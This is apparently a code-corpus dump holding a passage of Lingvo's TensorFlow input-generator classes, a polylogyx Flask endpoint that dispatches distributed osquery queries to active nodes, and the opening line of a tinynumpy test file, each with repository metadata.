      - bprop_variable_filters: optional list of filters for each source.

    Raises:
      ValueError: If file_datasource is not set
    """
    p = self.params
    if p.use_per_host_infeed and not self._in_get_processed_input_batch:
      raise ValueError(
          'This input generator does not support p.use_per_host_infeed. '
          'Please set it to False, or move the call to self._BuildDataSource() '
          'from self.__init__() to self._InputBatch() for batches to be '
          'correctly replicated per host.')
    if not p.file_datasource and p.file_pattern:
      # This is a workaround for subclasses which have defined
      # their own data source-like functionality.
      tf.logging.info(
          'Creating data source-like output from class %s using '
          'file_pattern %s', self, p.file_pattern)
      ret = py_utils.NestedMap()
      ret.data = self._DataSourceFromFilePattern(p.file_pattern)
    else:
      tf.logging.info(
          'Building data source %s with params %s and '
          'file_pattern %s', self.datasource, self.datasource.params,
          p.file_pattern)
      batch = self.datasource.GetNext()
      ret = self.datasource.GetMeta()
      ret.data = batch
    # Cache bprop metadata on the instance when the datasource provides it;
    # presumably consumed by the training loop — TODO confirm against callers.
    if 'selected_bprop' in ret:
      self._bprop_onehot = ret.selected_bprop
    if 'bprop_variable_filters' in ret:
      self._bprop_variable_filters = ret.bprop_variable_filters
    if 'source_selected' not in ret:
      ret.source_selected = None
    return ret

  def _BuildDataSource(self):
    """Read and return input batch from `p.file_pattern`.

    Same as _BuildDataSourceWithMetadata but does not return any metadata.

    Returns:
      A `.NestedMap` of tf.Tensor as in `self._DataSourceFromFilePattern()`.

    Raises:
      ValueError: If unknown token type.
    """
    return self._BuildDataSourceWithMetadata()['data']
class BaseSequenceInputGenerator(BaseInputGeneratorFromFiles):
  """The basic sequence input generator.

  Subclasses should implement _DataSourceFromFilePattern defined in
  BaseInputGeneratorFromFiles.
  """

  @classmethod
  def Params(cls):
    """Defaults params for sequence input generators."""
    p = super().Params()
    p.Delete('batch_size')
    # How input should be bucketized.
    p.Define(
        'bucket_upper_bound', [2560], 'Bucketing scheme. Required to be'
        'a sorted list of integers. Examples that are longer than all bucket'
        'upper bounds are skipped.')
    p.Define(
        'bucket_batch_limit', [8],
        'Desired per-split batch size per bucket. Scaled in '
        'infeed_bucket_batch_limit to the infeed size.'
        'Must be the same length as bucket_upper_bound.')
    p.Define(
        'bucket_adjust_every_n', 0, 'If non-zero, optimize the values of '
        'bucket_upper_bound except the last one after every N records '
        'based on the current input length distribution.')
    p.Define('source_max_length', None,
             'The maximum length of the source sequence.')
    p.Define('target_max_length', 300,
             'The maximum length of the target sequence.')
    p.Define('pad_to_max_seq_length', False,
             'If True, input tensors will be padded to max_length.')
    p.Define('tokenizer', tokenizers.AsciiTokenizer.Params(),
             'Tokenizer params.')
    p.Define(
        'tokenizer_dict', {},
        'If multiple tokenizers are required, they can be accessed through '
        'this dict via a key.')
    return p

  def __init__(self, params):
    """Creates the tokenizer children declared in p.tokenizer_dict."""
    super().__init__(params)
    p = self.params

    if p.tokenizer:
      # The default tokenizer is registered under DEFAULT_TOKENIZER_KEY and
      # must not collide with an explicitly provided entry.
      assert DEFAULT_TOKENIZER_KEY not in p.tokenizer_dict
      p.tokenizer_dict[DEFAULT_TOKENIZER_KEY] = p.tokenizer

    self.tokenizer_dict = {}
    # Bug fix: the original code iterated `for k, p in ...`, rebinding `p`
    # (the layer params) to each tokenizer's params. Nothing after the loop
    # read the clobbered `p`, but the shadowing was an accident waiting to
    # happen; use a dedicated loop variable instead.
    for key, tokenizer_params in p.tokenizer_dict.items():
      if tokenizer_params:
        name = '_tokenizer_' + key
        self.CreateChild(name, tokenizer_params)
        self.tokenizer_dict[key] = self.children[name]
      else:
        self.tokenizer_dict[key] = None

    if DEFAULT_TOKENIZER_KEY in self.tokenizer_dict:
      # Convenience alias for the common single-tokenizer case.
      self.tokenizer = self.tokenizer_dict[DEFAULT_TOKENIZER_KEY]

  @property  # Adjust batch size according to the cluster spec.
  def infeed_bucket_batch_limit(self):
    """Returns the bucket batch limit for one infeed host."""
    p = self.params
    infeed_bucket_batch_limit = [
        batch_utils.scale_split_to_infeed(b, p.use_per_host_infeed)
        for b in p.bucket_batch_limit
    ]
    tf.logging.info(
        'infeed_bucket_batch_limit={} num_splits_per_client={} bucket_batch_limit={}'
        .format(infeed_bucket_batch_limit, self.cluster.num_splits_per_client,
                p.bucket_batch_limit))
    return infeed_bucket_batch_limit

  def InfeedBatchSize(self):
    """Returns the batch size of one infeed pipeline.

    Override in subclass to provide dynamically shaped infeed batch size.

    If use_per_host_infeed is False then there is only one infeed pipeline and
    then the GlobalBatchSize() and the InfeedBatchSize() is the same.
    """
    buckets = self.infeed_bucket_batch_limit
    if any(x != buckets[0] for x in buckets):
      # With heterogeneous bucket limits we still have to report one size;
      # the max is used, so callers should expect padding for small buckets.
      tf.logging.warning('Using max bucket batch limit but not all limits are '
                         'the same {}'.format(buckets))
    infeed_size = max(buckets)
    tf.logging.info('InfeedBatchSize: %d', infeed_size)
    return infeed_size

  def _InputOpBucketingArgs(self):
    """Returns bucketing args derived from the sequence-length buckets."""
    p = self.params
    bucket_batch_limit = self.infeed_bucket_batch_limit
    tf.logging.info('infeed_bucket_batch_limit %r', bucket_batch_limit)
    return {
        'bucket_upper_bound': p.bucket_upper_bound,
        'bucket_batch_limit': bucket_batch_limit,
        'bucket_adjust_every_n': p.bucket_adjust_every_n,
    }

  def StringsToIds(self,
                   strs,
                   is_source=False,
                   external_max_length=None,
                   external_append_eos=None,
                   key=None,
                   languages=None):
    """Tokenize strs into vocab ids.

    Args:
      strs: A vector of strings.
      is_source: A bool to indicate whether to use `source_max_length` to pad
        'strs'.
      external_max_length: An int providing the max_length for strs.
      external_append_eos: Bool or None. If None, will be ignored and
        `params.append_eos` will be used. If bool, will determine if an eos
        symbol will be added to tokens.
      key: A string key in case the model has multiple tokenizers.
      languages: A vector of str with the same length as `strs`.

    Returns:
      A tuple (ids, labels, paddings) with the same shape [batch, maxlen].

      - ids[i, j] is the input token id of i-th sample for j-th step.
      - labels[i, j] is the target token id of i-th sample for j-th step.
      - paddings[i, j] is 1 iff i-th sample's j-th step is padded.

      Usually ids[i, 0] == SOS, ids[i, j+1] == labels[i, j], and labels[i, :]
      ends with EOS. That is, `ids` and `labels` are inputs and ground-truth
      labels for step-by-step teacher-forcing training, respectively.

    Raises:
      ValueError: If unknown token type.
    """
    p = self.params
    # Precedence: explicit override > source length > target length.
    if external_max_length is not None:
      maxlen = external_max_length
    elif is_source:
      maxlen = p.source_max_length
    else:
      maxlen = p.target_max_length
    key = key or DEFAULT_TOKENIZER_KEY
    return self.tokenizer_dict[key].StringsToIds(
        strs, maxlen, external_append_eos, languages=languages)

  def StringsToIdsWithOffsets(self,
                              strs,
                              is_source=False,
                              external_max_length=None,
                              external_append_eos=None,
                              key=None,
                              languages=None):
    """Tokenize strs into vocab ids, and also return byte-level offsets.

    Args:
      strs: A vector of strings.
      is_source: A bool to indicate whether to use `source_max_length` to pad
        'strs'.
      external_max_length: An int providing the max_length for strs.
      external_append_eos: Bool or None. If None, will be ignored and
        `params.append_eos` will be used. If bool, will determine if an eos
        symbol will be added to tokens.
      key: A string key in case the model has multiple tokenizers.
      languages: A vector of str with the same length as `strs`.

    Returns:
      A tuple (ids, labels, paddings) with the same shape [batch, maxlen].

      - ids[i, j] is the input token id of i-th sample for j-th step.
      - labels[i, j] is the target token id of i-th sample for j-th step.
      - paddings[i, j] is 1 iff i-th sample's j-th step is padded.
      - start_offset[i, j] is the byte-level offset of the start of the j-th id
        in the i-th original string
      - end_offset[i, j] is the byte-level offset of the end of the j-th id
        in the i-th original string

      Usually ids[i, 0] == SOS, ids[i, j+1] == labels[i, j], and labels[i, :]
      ends with EOS. That is, `ids` and `labels` are inputs and ground-truth
      labels for step-by-step teacher-forcing training, respectively.

    Raises:
      ValueError: If unknown token type.
      Exception: If the specified tokenizer does not support offsets.
    """
    p = self.params
    # Same maxlen resolution as StringsToIds.
    if external_max_length is not None:
      maxlen = external_max_length
    elif is_source:
      maxlen = p.source_max_length
    else:
      maxlen = p.target_max_length
    key = key or DEFAULT_TOKENIZER_KEY
    return self.tokenizer_dict[key].StringsToIdsWithOffsets(
        strs, maxlen, external_append_eos, languages=languages)

  def IdsToStrings(self, ids, lens, key=None):
    """Converts ids back to strings.

    Args:
      ids: A matrix of shape [batch, seqlen]. ids[i, :] is the i-th sample's
        ids.
      lens: A vector of shape [batch]. lens[i] is the sequence length of the
        i-th sample. Only the first lens[i] tokens in ids[i, :] are valid tokens
        for the i-th sequence.
      key: A string key in case the model has multiple tokenizers.

    Returns:
      sequences - A vector of shape [batch]. The converted string sequence.

    Raises:
      ValueError: If unknown token type.
    """
    key = key or DEFAULT_TOKENIZER_KEY
    return self.tokenizer_dict[key].IdsToStrings(ids, lens)

  def Cast(self, v):
    """Cast tensor dtype to fprop_dtype.

    Non-floating tensors (e.g. ids, lengths) are returned unchanged.
    """
    if not v.dtype.is_floating:
      return v
    return tf.cast(v, py_utils.FPropDtype(self.params))
class BaseTinyDatasetInput(BaseInputGenerator):
  """Input generator for tiny dataset which are stored in tf checkpoint.

  | Input batch (b: batch size, h: height, w: width, d: depth):
  | raw: Samples. [b, h, w, d].
  | data: Preprocessed samples. [b, h, w, d].
  | label: Labels. [b].
  | weight: [b]. weight[i] is 1.0 if i-th sample is considered to
  | be a real example. Otherwise, weight[i] is 0.0.
  """

  @classmethod
  def Params(cls):
    """Defaults params."""
    p = super().Params()
    p.Define('ckpt', None, 'A TensorFlow checkpoint.')
    p.Define('data', 'x_train', 'The tensor name in the ckpt.')
    p.Define('data_dtype', tf.uint8, 'The tensor dtype in the ckpt.')
    p.Define(
        'data_shape', (0, 0, 0), 'A tuple of ints. E.g., a tiny image '
        'has the shape (height, weight, depth).')
    p.Define('label', 'y_train', 'The tensor name in the ckpt.')
    p.Define('label_dtype', tf.uint8, 'The tensor dtype in the ckpt.')
    p.Define('repeat', True, 'If true, goes through the dataset repeatedly.')
    p.use_per_host_infeed = True
    return p

  def _InputBatch(self):
    """Builds one input batch by sampling from the in-memory dataset.

    Returns:
      A `.NestedMap` with keys raw, data, label, weight (and sample_ids when
      not running on TPU), each padded/trimmed to the infeed batch size.
    """
    p = self.params

    @tf.function
    def ReadData():
      # Reads the data and label tensors directly out of the checkpoint file.
      x, y = io_ops.restore_v2(p.ckpt, [p.data, p.label], [''] * 2,
                               [p.data_dtype, p.label_dtype])
      # Always convert to float32.
      return tf.cast(x, tf.float32), tf.cast(y, tf.float32)

    # Loads data and label into memory and keep it around.
    # ops.cached_call presumably memoizes ReadData so the checkpoint is read
    # only once per process — TODO confirm against the op's implementation.
    data, label = ops.cached_call(
        f=ReadData.get_concrete_function(), T=[tf.float32, tf.float32])
    b, shape = self.InfeedBatchSize(), list(p.data_shape)
    data = tf.reshape(data, [-1] + shape)
    label = tf.reshape(label, [-1])
    # One label per sample; fails fast on a mismatched checkpoint.
    label = py_utils.HasShape(label, [tf.shape(data)[0]])
    sample_ids = ops.random_permutation_sequence(
        num=p.num_samples,
        batch=b,
        repeat=p.repeat,
        seed=p.random_seed if p.random_seed else 0)
    # n may be < b on the final (partial) batch; weight marks real examples.
    n = tf.shape(sample_ids)[0]
    raw = py_utils.PadOrTrimTo(tf.gather(data, sample_ids), [b] + shape)
    ret = py_utils.NestedMap(
        raw=raw,
        data=self._Preprocess(raw),
        label=py_utils.PadOrTrimTo(tf.gather(label, sample_ids), [b]),
        weight=py_utils.PadOrTrimTo(tf.ones([n], dtype=tf.float32), [b]))
    if not py_utils.use_tpu():
      ret['sample_ids'] = sample_ids
    return ret

  def _Preprocess(self, raw):
    # Identity by default; subclasses override for e.g. image normalization.
    return raw
class TFDataSequenceInputGenerator(BaseSequenceInputGenerator):
  """tf.data input pipeline for sequences.

  Inherits params from BaseSequenceInputGenerator so this can be a drop-in
  replacement for existing input generators inheriting from
  BaseSequenceInputGenerator. However, many params may be ignored / unused.
  """

  @classmethod
  def Params(cls):
    """Defaults params for tf.data sequence input generators."""
    p = super().Params()
    p.Define('prefetch_buffer_size', 1, 'Local prefetch buffer size.')
    p.resettable = True
    return p

  def CreateDatasource(self):
    """Builds the tf.data datasource chain and stores it in p.file_datasource.

    The chain is: file source -> TakeEvalSamples -> length bucketing ->
    (optional tf.data service) -> local prefetch.
    """
    p = self.params
    if not p.file_datasource:
      # Convert p.file_pattern into p.file_datasource.
      ds = self.ConvertFilePatternToDataSource(p, p.file_pattern)
      p.file_pattern = ''
    else:
      ds = p.file_datasource
    ds = datasource.CustomTFDatasetTransform.Params().Set(
        sub=ds, fn='TakeEvalSamples')
    ds = datasource.TFDatasetBatchBySequenceLength.Params().Set(
        sub=ds,
        seqlen_fn='GetSequenceLength',
        input_shape_fn='_InputShape',
        input_padding_fn='_InputPaddingValue',
        bucket_upper_bound=p.bucket_upper_bound,
        bucket_batch_limit=p.bucket_batch_limit)
    if self.cluster.tf_data_service_address:
      ds = datasource.TFDataServiceSource.Params().Set(
          sub=ds, bucket_upper_bound=p.bucket_upper_bound)
    ds = datasource.TFDatasetPrefetch.Params().Set(
        sub=ds, buffer_size=p.prefetch_buffer_size)
    p.file_datasource = ds
    super().CreateDatasource()

  @classmethod
  def ConvertFilePatternToDataSource(cls, p, file_pattern):
    """Converts a legacy file_pattern value into a datasource Params chain.

    Args:
      p: The input generator Params (used for buffer sizes / mixing flags).
      file_pattern: A comma-separated string, a list of pattern strings, or a
        list of (pattern, weight) tuples.

    Returns:
      A datasource Params object wrapping the file source(s) with
      'ProcessDataset' applied.

    Raises:
      ValueError: If file_pattern mixes strings and tuples, a pattern contains
        a comma, or multiple patterns are given without within-batch mixing.
    """
    if isinstance(file_pattern, str):
      file_patterns = file_pattern.split(',')
      weights = None
    else:
      # Idiom fix: use generator expressions with all() rather than
      # materializing intermediate lists.
      if all(isinstance(x, str) for x in file_pattern):
        file_patterns = file_pattern
        weights = None
      elif all(isinstance(x, tuple) for x in file_pattern):
        file_patterns, weights = zip(*file_pattern)
      else:
        raise ValueError(
            f'file_pattern must be all strings or all tuples, but got: '
            f'{file_pattern}.')
    # Commas are the legacy pattern separator; a comma inside an individual
    # pattern would be ambiguous.
    for fp in file_patterns:
      if ',' in fp:
        raise ValueError(f'file_pattern should not contain comma: {fp}')
    ds = []
    for fp in file_patterns:
      ds.append(datasource.TFDatasetFnInput.Params().Set(
          load_fn='LoadDataset',
          kwargs=dict(file_pattern=fp),
          shuffle_buffer_size=p.file_buffer_size))
    if len(ds) > 1:
      if not p.use_within_batch_mixing:
        raise ValueError(
            'Only p.use_within_batch_mixing is supported with multiple '
            'file_patterns.')
      ds = [datasource.TFDatasetMixer.Params().Set(sub=ds, weights=weights)]
    ds = datasource.CustomTFDatasetTransform.Params().Set(
        sub=ds[0], fn='ProcessDataset')
    return ds

  def Reset(self, sess):
    """Resets the underlying datasource (p.resettable is True)."""
    self.datasource.Reset(sess)

  def GetPreprocessedInputBatch(self):
    """Returns the next batch from the datasource."""
    return self.datasource.GetNext()

  def LoadDataset(self, file_pattern):
    """Load a dataset from file.

    Args:
      file_pattern: the path to the file to load.

    Returns:
      A tf.data.Dataset() whose elements represent a single training sample
      without a leading batch dim.
    """
    raise NotImplementedError()

  def TakeEvalSamples(self, dataset):
    """Limits the dataset to p.num_samples examples during eval."""
    p = self.params
    if self.do_eval and p.num_samples > 0:
      dataset = dataset.take(p.num_samples)
    return dataset

  def ProcessDataset(self, dataset):
    """Processes a dataset returned by LoadDataset.

    Args:
      dataset: A dataset returned by LoadDataset.

    Returns:
      A processed dataset containing NestedMaps of Tensors without a leading
      batch dimension.
    """
    raise NotImplementedError()

  def GetSequenceLength(self, example):
    """Returns sequence length for the example NestedMap from the dataset.

    Args:
      example: A NestedMap containing an input example. Tensors in the example
        do not have a leading batch dimension.

    Returns:
      An integer sequence length for the example.
    """
    raise NotImplementedError()

  def _InputShape(self, key):
    """Returns the final shape of the tensor corresponding to key as a tuple.

    The shape should not include a leading batch dimension.

    Args:
      key: The NestedMap key to return shape for.

    Raises:
      ValueError: For keys this base class does not know; subclasses must
        override to describe their own features.
    """
    if key in ('source_id', 'bucket_keys'):
      return ()  # Scalars added by the framework itself.
    raise ValueError('Unexpected key %s' % key)

  def _InputPaddingValue(self, key, tensorspec):
    """Returns the value to pad the tensor corresponding to key with."""
    # Padding positions are marked 1 in *_paddings tensors; everything else
    # is padded with zeros.
    if key.endswith('_paddings'):
      return tf.ones([], dtype=tensorspec.dtype)
    else:
      return tf.zeros([], dtype=tensorspec.dtype)
class BaseDataExampleInputGenerator(BaseInputGenerator):
  """Base class for input generators that read Feature protos via tf.data."""

  @classmethod
  def Params(cls):
    """Defaults params."""
    p = super().Params()
    p.Define('input_files', None, 'Delimited glob of input files.')
    p.Define(
        'dataset_type', None,
        'A dataset class constructor such as tf.data.TFRecordDataset. '
        'The class constructor must take a list of filenames and produce an '
        'object that extends tf.data.Dataset.')
    p.Define('randomize_order', True, 'Whether to randomize the order.')
    p.Define('parallel_readers', 1, 'Number of parallel reader threads.')
    p.Define('num_examples', -1, 'Number of examples (-1 for unlimited).')
    p.Define(
        'num_epochs', -1,
        'Number of passes through the data to make (-1 for unlimited).'
        '`tf.errors.OutOfRangeError` is thrown after the limit is reached.')
    p.Define('randomize_shuffle_size', 500,
             'Size of the random shuffle buffer.')
    return p

  def __init__(self, params):
    """Validates that the required file/dataset params are set."""
    super().__init__(params)
    p = params
    assert p.input_files, (
        'input_files is required for a tf.data example input generator')
    assert p.dataset_type, (
        'dataset_type is required for a tf.data example input generator')

  def GetFeatureSpec(self):
    """Subclasses must implement and return a feature spec.

    Returns:
      NestedMap of features compatible with tf.io.parse_example. Default
      implementation returns an empty dict.
    """
    return {}

  def _AdditionalPreprocessInputBatch(self, batch):
    """Additionally preprocesses input batch from iterator.get_next().

    Args:
      batch: A NestedMap (or list of NestedMaps when using TPU sharded infeed)
        containing input tensors in the format returned by
        _PreprocessInputBatch.

    Returns:
      A NestedMap containing additionally preprocessed inputs to feed to the
      model.
    """
    return batch

  def GetPreprocessedInputBatch(self):
    """Builds the tf.data pipeline and returns one preprocessed batch.

    Pipeline: list_files -> parallel_interleave(dataset_type) -> shuffle ->
    take -> repeat -> batch -> parse/preprocess -> prefetch.

    Returns:
      A NestedMap of batched input tensors.
    """
    p = self.params

    def ParseAndProcess(*cols):
      """Parses a Tensorflow example into features."""
      # Assume either one or two column input. If one, then the record is
      # assumed to be that column. If 2, then it is assumed to be a KV store
      # and the record is the second column.
      assert len(cols) in [
          1, 2
      ], ('BaseExampleInputGenerator supports one or two column input')
      record = cols[-1]
      feature_spec = self.GetFeatureSpec()
      features = py_utils.NestedMap(tf.io.parse_example(record, feature_spec))
      return self._PreprocessInputBatch(features)

    dataset_factory = p.dataset_type
    # NOTE(review): tf.data.experimental.parallel_interleave and
    # make_one_shot_iterator below are TF1-era APIs; presumably this class is
    # only used in graph mode — confirm before porting to TF2.
    dataset = (
        tf.data.Dataset.list_files(
            p.input_files, shuffle=bool(p.randomize_order)).apply(
                tf.data.experimental.parallel_interleave(
                    dataset_factory,
                    cycle_length=p.parallel_readers,
                    sloppy=p.randomize_order)))
    if p.randomize_order:
      dataset = dataset.shuffle(p.randomize_shuffle_size)
    # take(-1)/repeat(-1) mean "unlimited" per tf.data semantics.
    dataset = dataset.take(p.num_examples)
    dataset = dataset.repeat(p.num_epochs)
    # Batch before parsing so tf.io.parse_example operates on a vector of
    # serialized records at once.
    dataset = dataset.batch(self.InfeedBatchSize(), drop_remainder=True)
    dataset = dataset.map(
        ParseAndProcess, num_parallel_calls=p.parallel_readers)
    dataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)
    iterator = dataset.make_one_shot_iterator()
    input_batch = iterator.get_next()
    return self._AdditionalPreprocessInputBatch(input_batch)
def DefineTFDataInput(name,
                      func,
                      ignore_args=None,
                      map_args=None,
                      base_class=BaseInputGenerator):
  """Defines a new InputGenerator class from given tf.data pipeline.

  This function allows users to utilize existing tf.data pipelines which are
  defined externally, without making binding boilerplates.

  The generated InputGenerator behaves like a one-shot iterator of the given
  pipeline. If the iterator is designed to be repeated, the returned
  InputGenerator will work similarly.

  This function generates `Params` automatically by analysing the given
  pipeline's signature so that the behavior of the pipeline can be saved into
  `Params`.

  This function defines the InputGenerator class on the caller's module. To
  avoid any confusion, the returned class have to be stored in the module-level
  symbol with the same identifier with given `name`.

  Example:
    >>> # A tf.data pipeline which returns a dict of Tensors.
    >>> def my_dataset(begin=0, end=10):
    ...   ds = tf.data.Dataset.from_tensor_slices(tf.range(begin, end))
    ...   return ds.map(lambda x: {'value': x})

    >>> # Defines the InputGenerator class for my_dataset.
    >>> MyInput = DefineTFDataInput('MyInput', my_dataset)

    >>> # Obtains Params of MyInput.
    >>> p = MyInput.Params()
    >>> assert p.args.begin == 0
    >>> assert p.args.end == 10

    >>> # Instantiates the InputGenerator from Params.
    >>> ig = p.Instantiate()
    >>> assert isinstance(ig, MyInput)

    >>> # Obtains the data tensors.

    >>> # In TFv1:
    >>> data = ig.GetPreprocessedInputBatch()
    >>> with tf.Session() as sess:
    ...   values = sess.run(data)  # {'value': 0}
    ...   values = sess.run(data)  # {'value': 1}
    ...   values = sess.run(data)  # {'value': 2}

    >>> # In TFv2:
    >>> values = ig.GetPreprocessedInputBatch()  # {'value': 0}
    >>> values = ig.GetPreprocessedInputBatch()  # {'value': 1}
    >>> values = ig.GetPreprocessedInputBatch()  # {'value': 2}

  Args:
    name: A string, representing the name of the new InputGenerator class.
    func: A callable to be analysed to generate the new InputGenerator. The
      return value of `func` must be a single `tf.data.Dataset` which yields a
      dict or its subclasses. The signature (parameter list) of `func` must have
      all explicit parameters needed to configure the pipeline. `*args` and
      `**kwargs` parameters would be ignored from defining `Params`.
    ignore_args: A collection of strings, representing the set of parameter
      names to be ignored from defining `Params`.
    map_args: A {str: str} dict, representing mappings from existing fields in
      `Params()` to `func`'s parameter. These mappings can be used to propagate
      some particular Lingvo-specific options defined by others (typically by
      super classes: `BaseInputGenerator` or `BaseLayer`) to the given function.
      Each entry in the dict represents a `{func_param: layer_param}` pair such
      that the `Params().layer_param` field will be mapped to the parameter
      `func_param` of `func`. `func_param` won't be added into `Params().args`
      to avoid duplicated definitions about the same parameters.
    base_class: A class name to inherit from, default is BaseInputGenerator.

  Returns:
    A new InputGenerator class that invokes `func` internally. The `Params()`
    method of the returned class makes a new Params containing the `args` field
    representing the parameters of `func`. The `GetPreprocessedInputBatch()`
    method returns a `py_utils.NestedMap` representing the same dict of the
    obtained data from the dataset.
  """
  # Normalize optional collections so later code can use set/dict operations.
  ignore_args = set(ignore_args if ignore_args is not None else ())
  map_args = dict(map_args if map_args is not None else {})

  # Defines the class first as it will be required to call `super()`.
  generated_cls = type(name, (base_class,), {})

  @classmethod
  def _Params(cls):
    """Generates Params to configure the InputGenerator.

    This function analyses the signature of the given callable `func` and
    defines corresponding fields into `Params` to the obtained function
    parameters.

    Returns:
      An `InstantiableParams` object representing the InputGenerator. It has the
      `args` field which contains the set of parameters of `func`.
    """
    # Keys in `map_args` will also be ignored.
    actual_ignore_args = ignore_args | set(map_args.keys())

    p = super(generated_cls, cls).Params()

    # Introduces a new group `args` to avoid confusion between `func`'s
    # parameters and existing params defined by super classes.
    # TODO(oday): For better UX, consider removing this nested field and add
    # `func`s parameters to `p` directly. We need to make sure that there are no
    # side effects by integrating `func`'s parameters and follows:
    # - BaseInputGenerator.Params()
    # - BaseLayer.Params()
    # - InstantiableParams.cls
    p.Define('args', hyperparams.Params(), 'Parameter list of the pipeline.')
    inspect_utils.DefineParams(func, p.args, actual_ignore_args)

    ds = datasource.TFDatasetFnInput.Params().Set(
        load_fn='GetDataset', shuffle_buffer_size=1)
    if cluster_factory.Current().tf_data_service_address:
      ds = datasource.TFDataServiceSource.Params().Set(sub=ds)
      ds = datasource.TFDatasetPrefetch.Params().Set(sub=ds)
    p.file_datasource = ds
    return p

  def _GetDataset(self):
    """Invokes `func` with values stored in Params and returns its dataset."""
    p = self.params
    # map_args entries pull values from top-level Params fields rather than
    # from p.args.
    overrides = {k: p.Get(v) for k, v in map_args.items()}
    dataset = inspect_utils.CallWithParams(func, p.args, **overrides)
    assert isinstance(dataset, (tf.tf1.data.Dataset, tf.tf2.data.Dataset)), (
        'DefineTFDataInput must take a callable which returns a '
        '`tf.data.Dataset`. The given callable `%s` returned `%s`' %
        (func, dataset))
    return dataset

  def _GetPreprocessedInputBatch(self):
    """Generates data tensors by invoking the pipeline."""
    # TFv1: Returns Tensors which will be determined by Session.run().
    # TFv2: Returns Tensors with actual values.
    data = self.datasource.GetNext()

    # Converts dict to NestedMap to maintain consistency with existing
    # functionalities in base_input_generator.
    # TODO(oday): Consider mitigating this restriction.
    assert isinstance(data, dict), (
        'DefineTFDataInput accepts only datasets that returns a dict or its '
        'subclasses.')
    if not isinstance(data, py_utils.NestedMap):
      data = py_utils.NestedMap.FromNestedDict(data)

    return data

  # Overrides member methods.
  generated_cls.Params = _Params
  generated_cls.GetDataset = _GetDataset
  generated_cls.GetPreprocessedInputBatch = _GetPreprocessedInputBatch

  # Sets __module__ to the caller's module name for pickling and restoring from
  # Params to work.
  # See also the namedtuple's implementation for details.
  module = inspect.stack()[1].frame.f_globals.get('__name__', '__main__')
  generated_cls.__module__ = module

  return generated_cls
| 41.342193
| 95
| 0.680676
|
4a15b86a50fabe20130acdacc82ad86a90f2218b
| 3,846
|
py
|
Python
|
plgx-esp-ui/polylogyx/blueprints/distributed.py
|
dhoomakethu/plgx-esp
|
b466b52a5e16a0d12a61e505e48add83bee5bad4
|
[
"MIT"
] | 20
|
2019-12-09T13:55:13.000Z
|
2022-01-10T09:10:42.000Z
|
plgx-esp-ui/polylogyx/blueprints/distributed.py
|
dhoomakethu/plgx-esp
|
b466b52a5e16a0d12a61e505e48add83bee5bad4
|
[
"MIT"
] | 13
|
2019-12-03T13:27:27.000Z
|
2021-12-03T05:22:49.000Z
|
plgx-esp-ui/polylogyx/blueprints/distributed.py
|
dhoomakethu/plgx-esp
|
b466b52a5e16a0d12a61e505e48add83bee5bad4
|
[
"MIT"
] | 16
|
2019-11-15T11:45:06.000Z
|
2022-01-07T08:07:11.000Z
|
from sqlalchemy import or_
import json
import datetime as dt
from flask import jsonify, request, current_app
from flask_restplus import Namespace, Resource, marshal
from polylogyx.models import db
from .utils import *
from polylogyx.utils import require_api_key, create_tags, get_tags, validate_osquery_query
from polylogyx.dao import nodes_dao as nodedao
from polylogyx.dao import distributed_dao as dao
from polylogyx.wrappers import query_wrappers as wrapper
from polylogyx.wrappers import parent_wrappers as parentwrapper
ns = Namespace('distributed', description='distributed query related operations')
# Distributed Query section
@require_api_key
@ns.route('/add', endpoint = 'distributed_add')
@ns.doc(params={'query':'query', 'tags': 'tags', 'nodes':'nodes', 'description':'description for the post method'})
class DistributedQueryClass(Resource):
    '''
    Creates a distributed (live) query and queues a task for every
    matching active node.

    Target nodes are chosen by explicit node keys, by tags, or — when
    neither is supplied — every registered node receives the query.
    Returns the new query id on success, or a failure response when the
    SQL is invalid or no node is currently active.
    '''
    parser = requestparse(['query','tags','nodes','description'],[str, str, str, str],['query','tags list string seperated by commas','nodes list by comma separated','description'],[True, False, False, False])

    @ns.expect(parser)
    def post(self, node=None):
        from manage import declare_queue
        args = self.parser.parse_args()  # need to exists for input payload validation
        sql = args['query']

        # Fail fast on invalid SQL. Previously this message was silently
        # overwritten by the "No active node present" branch below, so the
        # caller never saw the real validation error.
        if not validate_osquery_query(sql):
            message = u'Field must contain valid SQL to be run against osquery tables'
            return marshal(respcls(message), parentwrapper.failure_response_parent)

        current_app.logger.info(
            "%s - %s checking in for distributed query",
            request.remote_addr, node
        )

        # Resolve the target node set: explicit node keys and/or tags,
        # falling back to all nodes when neither filter is supplied.
        tags = args['tags'].split(',') if args['tags'] else []
        nodeKeyList = args['nodes'].split(',') if args['nodes'] else []
        nodes = []
        if not nodeKeyList and not tags:
            # all nodes get this query
            nodes = nodedao.get_all_nodes()
        if nodeKeyList:
            nodes = nodedao.extendNodesByNodeKeyList(nodeKeyList)
        if tags:
            nodes = nodedao.extendNodesByTag(tags)

        query = dao.add_distributed_query(sql, args['description'])

        # Windows agents use the win_-prefixed event tables; prepare a
        # rewritten variant of the SQL for them. Queries that already name
        # win_* tables are Windows-only and are skipped for other platforms.
        win_sql_query = None
        query_windows_specific = False
        if 'win_file_events' in query.sql or 'win_process_events' in query.sql:
            win_sql_query = query.sql
            query_windows_specific = True
        elif 'file_events' in query.sql:
            win_sql_query = query.sql.replace('file_events', 'win_file_events')
        elif 'process_events' in query.sql:
            win_sql_query = query.sql.replace('process_events', 'win_process_events')

        onlineNodes = 0
        for node in nodes:
            if node.node_is_active():
                onlineNodes += 1
                task = dao.create_distributed_task_obj(node, query)
                if node.platform == 'windows':
                    task.sql = win_sql_query
                if not (node.platform != 'windows' and query_windows_specific):
                    db.session.add(task)
        # Single commit after all tasks are queued (matches the original
        # for-else behaviour: the loop never breaks).
        db.session.commit()
        declare_queue(query.id)

        if onlineNodes == 0:
            message = 'No active node present'
            return marshal(respcls(message), parentwrapper.failure_response_parent)
        return marshal({'query_id': query.id}, wrapper.add_query_wrapper)
| 39.649485
| 209
| 0.611544
|
4a15b8ae7a52fc7ee28cbc15314623e9c4064086
| 8,547
|
py
|
Python
|
test_tinynumpy.py
|
almarklein/tinynumpy
|
41edac9123ecbb9222eb28bc3dee507451b9d748
|
[
"MIT"
] | 9
|
2015-06-16T20:02:05.000Z
|
2021-03-02T23:13:14.000Z
|
test_tinynumpy.py
|
almarklein/tinynumpy
|
41edac9123ecbb9222eb28bc3dee507451b9d748
|
[
"MIT"
] | null | null | null |
test_tinynumpy.py
|
almarklein/tinynumpy
|
41edac9123ecbb9222eb28bc3dee507451b9d748
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
